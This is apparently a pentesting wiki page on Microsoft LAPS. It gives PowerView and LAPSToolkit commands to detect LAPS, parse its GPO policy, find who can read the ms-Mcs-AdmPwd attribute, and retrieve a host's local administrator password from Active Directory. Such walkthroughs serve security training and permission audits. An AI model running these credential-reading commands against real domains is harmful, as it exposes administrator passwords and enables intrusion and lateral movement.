LAPS
Introduction
Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory.
Enumeration
There are three main ways to check if LAPS is enabled on the machine you have access to.
Check if the
AdmPwd.dll
exists on the system.
dir C:\Program Files\LAPS\CSE
Check for GPOs related to "LAPS".
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
Check if the object
ms-Mcs-AdmPwdExpirationTime
is not null.
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
Exploitation
1. Download the Registry.pol,
which location is at the gpcfilesyspath
obtained while enumerating GPOs.
ls <GPCFileSysPath>\Machine\Registry.pol
2. Parse the file with the following command from the GPRegistryPolicyParser.
Parse-PolFile .\Desktop\Registry.pol
After parsing the file, you can obtain the following information:
Password complexity is upper, lower and numbers.
Password length is 14.
Passwords are changed every 30 days.
The LAPS managed account name is LapsAdmin.
Password expiration protection is disabled.
3. Then, it is time to find out who can read the LAPS password. (There are two alternatives).
Directly looking at the computer ADLS
# Obtain the SID
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Convert the SID
ConvertFrom-SID <SecurityIdentifier>
Using the LAPSToolkit.
. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups
4. Once you have the permissions to read the password, you can read it as follows.
Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd
Last updated